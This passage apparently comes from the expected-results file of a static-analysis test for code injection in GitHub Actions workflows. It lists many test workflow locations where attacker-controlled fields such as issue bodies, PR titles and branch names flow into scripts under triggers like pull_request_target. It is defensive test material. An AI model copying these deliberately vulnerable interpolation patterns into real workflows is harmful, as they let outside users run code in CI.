toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | 